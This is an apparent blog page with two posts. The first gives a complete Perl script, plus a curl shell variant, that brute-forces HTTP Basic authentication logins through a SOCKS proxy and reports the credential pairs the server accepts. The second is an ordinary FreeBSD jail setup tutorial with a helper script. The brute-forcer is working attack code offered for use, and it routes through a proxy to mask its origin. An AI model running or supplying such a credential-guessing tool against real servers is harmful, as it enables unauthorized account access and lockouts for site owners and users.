Sunday, October 14, 2007

HTTP Basic auth brute forcer that connects via a socks proxy

socks.pl is a Perl script that connects through a SOCKS proxy and tries every user:password pair in the given file against a web directory protected by HTTP Basic authentication, printing the pairs the server accepts.

Modules needed: IO::Socket::Socks, MIME::Base64 and Getopt::Std.

Usage:
perl socks.pl -s SOCKS_PROXY -d WEB_DIR -f USER_FILE -i WEB_SERVER -p PROXY_PORT -P WEB_SERVER_PORT

USER_FILE Format:
User:Pass

References:
RFC 1945 (HTTP/1.0; section 11.1 describes the Basic authentication scheme)

use strict;
use warnings;
use IO::Socket::Socks;
use MIME::Base64;
use Getopt::Std;

my $usage = "usage: $0 -s SOCKS_PROXY -p PROXY_PORT -i WEB_SERVER -P WEB_SERVER_PORT -d WEB_DIR -f USER_FILE";

# Parse the command line into the config hash; every option is required.
sub setOpts {
    my %opt;
    getopts('s:p:i:P:d:f:', \%opt) or printError($usage);
    my %configHash = (
        PServer => $opt{s},   # SOCKS proxy address
        PPort   => $opt{p},   # SOCKS proxy port
        SIP     => $opt{i},   # web server the proxy connects to
        SPort   => $opt{P},   # web server port
        Sdir    => $opt{d},   # protected path, e.g. /private/
        IDfile  => $opt{f},   # user:pass list, one pair per line
    );
    for my $key (keys %configHash) {
        printError($usage) unless defined $configHash{$key};
    }
    return %configHash;
}

# Open a fresh connection to the web server through the SOCKS proxy.
# One connection per attempt: the request is HTTP/1.0, so the server
# closes the connection after answering.
sub connectProxy {
    my %configHash = @_;
    my $sock = IO::Socket::Socks->new(
        ProxyAddr   => $configHash{PServer},
        ProxyPort   => $configHash{PPort},
        ConnectAddr => $configHash{SIP},
        ConnectPort => $configHash{SPort},
    ) or printError("SOCKS connect to $configHash{SIP}:$configHash{SPort} failed: $SOCKS_ERROR");
    return $sock;
}

sub printError {
    my ($errorMsg) = @_;
    print STDERR "$errorMsg\n";
    exit 1;
}

sub checkFile {
    my ($fileName) = @_;
    printError("Please check file $fileName") unless -f $fileName;
}

# Open the user:pass list and return the filehandle.
sub loadFile {
    my %configHash = @_;
    open(my $fh, '<', $configHash{IDfile})
        or printError("$! on file $configHash{IDfile}");
    return $fh;
}

# RFC 1945 section 11.1: the credentials are base64("user:pass").  The
# empty second argument stops encode_base64 from appending the newline it
# adds by default, which would otherwise cut the Authorization header in two.
sub convUserPass {
    my ($userInfo) = @_;
    return encode_base64($userInfo, '');
}

# Send one GET with Basic credentials per line of the file and print the
# pairs that are accepted.  Success is matched on the status code, not on
# the exact string "HTTP/1.1 200 OK", so an HTTP/1.0 server works too.
sub logIN {
    my ($fh, %configHash) = @_;
    while (my $userInfo = <$fh>) {
        chomp $userInfo;
        next if $userInfo eq '' || $userInfo !~ /:/;   # skip blanks and lines that are not user:pass

        my $sock        = connectProxy(%configHash);
        my $encUserPass = convUserPass($userInfo);

        # HTTP/1.0 request: header lines end in CRLF, an empty line ends the headers.
        print $sock "GET $configHash{Sdir} HTTP/1.0\r\n"
                  . "Host: $configHash{SIP}\r\n"
                  . "Authorization: Basic $encUserPass\r\n"
                  . "\r\n";

        my $status = <$sock>;          # first line: HTTP/1.x CODE REASON
        close $sock;
        next unless defined $status;
        chomp $status;

        if ($status =~ m{^HTTP/1\.[01] 200}) {
            print "$userInfo\n";
        } elsif ($status !~ m{^HTTP/1\.[01] 401}) {
            # 403, 429, 5xx and the like are not a wrong guess: the server may be
            # locking the account out or the proxy may be failing, so say so.
            print STDERR "unexpected reply for $userInfo: $status\n";
        }
    }
}

sub init {
    my %configHash = setOpts();
    checkFile($configHash{IDfile});
    my $fh = loadFile(%configHash);
    logIN($fh, %configHash);
    close $fh;
}

init();
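The same check done with curl through a SOCKS proxy, as an added example that is not part of the original post or the script above. What it adds is the reply handling: success is decided by the status code rather than by the exact string "HTTP/1.1 200 OK", and a reply that is neither 200 nor 401 stops the run, because 403, 429 or a 5xx usually means a lockout, rate limiting or a dead proxy rather than a wrong guess. It assumes a curl built with SOCKS support; the proxy, URL and file name are supplied by the caller and the ones shown in the comments are placeholders.

```shell
#!/bin/sh
# Added example, not code from the original post: Basic-auth guessing with
# curl through a SOCKS proxy, with status-line handling that copes with
# HTTP/1.0 servers, CRLF line ends and non-401 failures.
# Assumes curl with SOCKS support; proxy, URL and file are arguments.

# classify_status STATUS_LINE -> ok | denied | malformed | other:CODE
classify_status() {
    # accept HTTP/1.0 or HTTP/1.1 and tolerate the CR of a raw CRLF line
    code=$(printf '%s' "$1" | tr -d '\r' | sed -n 's/^HTTP\/1\.[01] \([0-9][0-9][0-9]\).*/\1/p')
    case "$code" in
        200) echo ok ;;
        401) echo denied ;;
        '')  echo malformed ;;
        *)   echo "other:$code" ;;
    esac
}

# basic_header USER PASS -> "Authorization: Basic <base64(user:pass)>"
# base64(1) emits a trailing newline (and wraps long input); strip both so
# the header stays on one line, the same trap as MIME::Base64's default.
basic_header() {
    printf 'Authorization: Basic %s' "$(printf '%s:%s' "$1" "$2" | base64 | tr -d '\n')"
}

# try_creds PROXY_HOST:PORT URL USER PASS -> classification of the reply
try_creds() {
    status_line=$(curl -s -S --max-time 15 --socks5 "$1" \
                       -H "$(basic_header "$3" "$4")" -D - -o /dev/null "$2" | head -n 1)
    classify_status "$status_line"
}

# run_list PROXY_HOST:PORT URL FILE -- FILE holds one user:pass per line; a
# password may itself contain ':' because read puts the remainder in pass.
run_list() {
    while IFS=: read -r user pass; do
        [ -z "$user" ] && continue
        result=$(try_creds "$1" "$2" "$user" "$pass")
        case "$result" in
            ok)     printf 'valid: %s:%s\n' "$user" "$pass" ;;
            denied) ;;
            *)      printf 'stopping on %s for user %s\n' "$result" "$user" >&2; return 1 ;;
        esac
    done < "$3"
}

if [ $# -eq 3 ]; then
    run_list "$@"    # e.g. ./basic.sh 127.0.0.1:1080 http://10.0.0.5/private/ users.txt (placeholders)
fi
```

Stopping on the first unexpected code is deliberate: a run that keeps hammering an account after the server has started answering 403 or 429 only adds lockouts and log noise, and a run of "malformed" replies means the proxy, not the password, is the problem.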

Saturday, October 13, 2007

FreeBSD jails the easy way

Jails are a nice, easy way to isolate processes in FreeBSD. A jail makes it possible to run services in a virtual system that keeps them from interacting with the host system. More in-depth information can be found in jail(8) and the FreeBSD Handbook.

Most, if not all, of the tutorials I have found have you recompile the system into a new directory, like the section6 wiki does. This just seems overly complicated and hard to do, especially if you are in a pinch for time. Getting ready for a security competition, my partner Sean Jordan introduced me to the sysinstall method of making jails.

When partitioning, I like to create a separate /jail partition to give the jails their own file system. I suggest at least 2 GB per jail; remember that all the files used by the users and services in a jail live on that partition, so size it accordingly. Each jail needs its own IP address; for my setup I am behind a router doing NAT on the subnet 172.16.67.0/24.

Once FreeBSD is installed, create the skeleton of the master jail by copying the host's binaries, libraries and configuration into it:

  1. mkdir /jail/master
  2. mkdir /jail/master/usr/
  3. cp -R /bin/ /jail/master/bin
  4. cp -R /etc/ /jail/master/etc
  5. cp -R /lib/ /jail/master/lib
  6. cp -R /libexec/ /jail/master/libexec
  7. cp -R /sbin/ /jail/master/sbin
  8. cp -R /usr/share /jail/master/usr/share
  9. cp -R /usr/bin /jail/master/usr/bin
  10. cp -R /usr/sbin /jail/master/usr/sbin
  11. cp -R /usr/lib /jail/master/usr/lib
Once you have all the needed directories, chroot yourself into /jail/master and run sysinstall:
  1. chroot /jail/master /bin/csh
  2. /usr/sbin/sysinstall
Once you are in, choose:
  1. Configure
  2. Distributions
  3. base
  4. (use ftp for media source)
  5. exit sysinstall
When you have the whole base distribution, exit the chroot. The base distribution replaces the configuration files copied from the host with the defaults (which is why the jail's root ends up with no password), but files it does not ship survive the earlier cp: look through /jail/master/etc for anything host-specific that should not be in every jail, such as SSH host keys under /etc/ssh, and delete it so each jail generates its own.
  1. exit
For demonstration purposes I'll create two jails, ssh and dns. Use -p so that ownership and the setuid bits (on /usr/bin/passwd, for example) survive the copy; cp without it creates the copies with setuid and setgid cleared.
  1. cp -Rp /jail/master/ /jail/ssh
  2. cp -Rp /jail/master/ /jail/dns
After the directories are made, edit /etc/rc.conf
  1. vi /etc/rc.conf
and add the following lines. The aliases put the jail addresses on the host interface (lnc0 here; use your own interface name), and the per-jail variables are keyed on the names listed in jail_list, so the names must match exactly.

  1. ifconfig_lnc0_alias0="172.16.67.47 netmask 255.255.255.0" #Add alias for your network
  2. ifconfig_lnc0_alias1="172.16.67.48 netmask 255.255.255.0" #Add alias for your network
  3. jail_enable="YES" # Set to NO to disable starting of any jails
  4. jail_list="ssh dns" # Space separated list of names of jails
  5. jail_set_hostname_allow="NO" # Allow root user in a jail to change its hostname
  6. jail_socket_unixiproute_only="YES" # Route only TCP/IP within a jail
  7. jail_ssh_rootdir="/jail/ssh"
  8. jail_ssh_hostname="ssh.bsd.local"
  9. jail_ssh_ip="172.16.67.47"
  10. jail_ssh_exec_start="/bin/sh /etc/rc"
  11. jail_ssh_devfs_enable="YES"
  12. jail_ssh_devfs_ruleset="devfsrules_jail"
  13. jail_dns_rootdir="/jail/dns"
  14. jail_dns_hostname="dns.bsd.local"
  15. jail_dns_ip="172.16.67.48"
  16. jail_dns_exec_start="/bin/sh /etc/rc"
  17. jail_dns_devfs_enable="YES"
  18. jail_dns_devfs_ruleset="devfsrules_jail"
Once the file is saved, bring up the interface aliases and start the jails. The quick way is to re-run the boot scripts:
  1. sh /etc/rc
Re-running /etc/rc restarts every service on the host; to do only the two steps that are needed, run /etc/rc.d/netif start and then /etc/rc.d/jail start instead.
Check that the jails are running with jls:
  • JID IP Address Hostname Path
  • 2 172.16.67.48 dns.bsd.local /jail/dns
  • 1 172.16.67.47 ssh.bsd.local /jail/ssh
Check that the interface carries the jail addresses by running ifconfig; each jail's IP from jls must show up as an inet address here, or nothing inside that jail will be reachable.

  • lnc0: flags=108843 mtu 1500
  • inet6 fe80::20c:29ff:fe3c:1ce8%lnc0 prefixlen 64 scopeid 0x1
  • inet 172.16.67.46 netmask 0xffffff00 broadcast 172.16.67.255
  • inet 172.16.67.47 netmask 0xffffff00 broadcast 172.16.67.255
  • inet 172.16.67.48 netmask 0xffffff00 broadcast 172.16.67.255

To enter a jail use jexec with the JID from jls. bash is not part of the base distribution, so until you install it inside the jail use one of the base shells:
  1. jexec 1 /bin/csh
Stopping jails can be done in two ways: /etc/rc.d/jail or pkill.
To stop all running jails run
  1. /etc/rc.d/jail stop
To stop just one jail (pkill -j kills every process belonging to that JID), run
  1. pkill -j JID
Once you are in the jail you can do whatever you would do on a normal system. If you want to use ICMP (ping, traceroute) from within a jail, set security.jail.allow_raw_sockets to 1 in /etc/sysctl.conf on the host:
  1. security.jail.allow_raw_sockets=1
Leave it at 0 unless you need it: it lets root inside a jail open raw sockets, which is one of the things jails normally take away.
On a final note, there are no users within the jail yet and the jail's root has no password (each jail has its own /etc/master.passwd, separate from the host's), so be sure to set one with the passwd command from inside each jail.
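The rc.conf block and the jls/ifconfig checks above, scripted, as an added example that is not part of the original post. The first helper prints the rc.conf fragment for any number of jails from one list, so the per-jail variable names cannot drift from jail_list; the second compares the addresses jls reports with the inet addresses in ifconfig output, which is the check to run when a jail starts but nothing inside it can be reached. The jail names, addresses and paths are the ones used in the post; the sample jls and ifconfig text at the bottom is constructed so the check can be exercised offline, with the .47 alias deliberately missing.

```shell
#!/bin/sh
# Added example, not code from the original post.  Two helpers for the jail
# setup: generate the /etc/rc.conf fragment, and cross-check jls against
# ifconfig.  Names/IPs/paths come from the post; the sample output below is
# constructed for an offline run.

# jail_rc_fragment IFACE NETMASK NAME IP HOSTNAME ROOTDIR [NAME IP HOSTNAME ROOTDIR]...
# Prints one interface alias per jail, the global jail_* settings, then the
# six jail_<name>_* variables per jail.
jail_rc_fragment() {
    iface=$1; netmask=$2; shift 2
    list=''; vars=''; idx=0
    while [ $# -ge 4 ]; do
        name=$1; ip=$2; host=$3; root=$4; shift 4
        printf 'ifconfig_%s_alias%d="%s netmask %s"\n' "$iface" "$idx" "$ip" "$netmask"
        idx=$((idx + 1))
        list="$list${list:+ }$name"
        vars="$vars
jail_${name}_rootdir=\"$root\"
jail_${name}_hostname=\"$host\"
jail_${name}_ip=\"$ip\"
jail_${name}_exec_start=\"/bin/sh /etc/rc\"
jail_${name}_devfs_enable=\"YES\"
jail_${name}_devfs_ruleset=\"devfsrules_jail\""
    done
    printf 'jail_enable="YES"\njail_list="%s"\n' "$list"
    printf 'jail_set_hostname_allow="NO"\njail_socket_unixiproute_only="YES"\n'
    printf '%s\n' "${vars#?}"      # drop the leading newline
}

# missing_jail_ips JLS_TEXT IFCONFIG_TEXT
# Prints every IP in the jls table that is not an inet address in the
# ifconfig text.  A jail is bound to its address, so a missing alias means
# the services inside it are listening on nothing.
missing_jail_ips() {
    printf '%s\n' "$1" | awk 'NR > 1 && NF >= 4 { print $2 }' | while read -r ip; do
        pat=$(printf '%s' "$ip" | sed 's/\./\\./g')    # escape the dots for grep -E
        if ! printf '%s\n' "$2" | grep -Eq "^[[:space:]]*inet[[:space:]]+$pat"'([[:space:]]|$)'; then
            printf '%s\n' "$ip"
        fi
    done
}

# Constructed sample output: jls lists both jails, but the .47 alias never
# came up on lnc0 (a typo in ifconfig_lnc0_alias0 would do this).
SAMPLE_JLS='   JID  IP Address      Hostname                      Path
     2  172.16.67.48    dns.bsd.local                 /jail/dns
     1  172.16.67.47    ssh.bsd.local                 /jail/ssh'
SAMPLE_IFCONFIG='lnc0: flags=108843 mtu 1500
        inet6 fe80::20c:29ff:fe3c:1ce8%lnc0 prefixlen 64 scopeid 0x1
        inet 172.16.67.46 netmask 0xffffff00 broadcast 172.16.67.255
        inet 172.16.67.48 netmask 0xffffff00 broadcast 172.16.67.255'

case "${1:-}" in
    rc)    shift; jail_rc_fragment "$@" ;;   # rc lnc0 255.255.255.0 ssh 172.16.67.47 ssh.bsd.local /jail/ssh ...
    check) missing_jail_ips "$(jls)" "$(ifconfig)" ;;          # on the host, after sh /etc/rc
    *)     missing_jail_ips "$SAMPLE_JLS" "$SAMPLE_IFCONFIG" ;;  # prints 172.16.67.47
esac
```

Run it as `sh jails.sh rc lnc0 255.255.255.0 ssh 172.16.67.47 ssh.bsd.local /jail/ssh dns 172.16.67.48 dns.bsd.local /jail/dns >> /etc/rc.conf` to append the fragment, and `sh jails.sh check` on the host after starting the jails; an empty result means every jail address is on an interface.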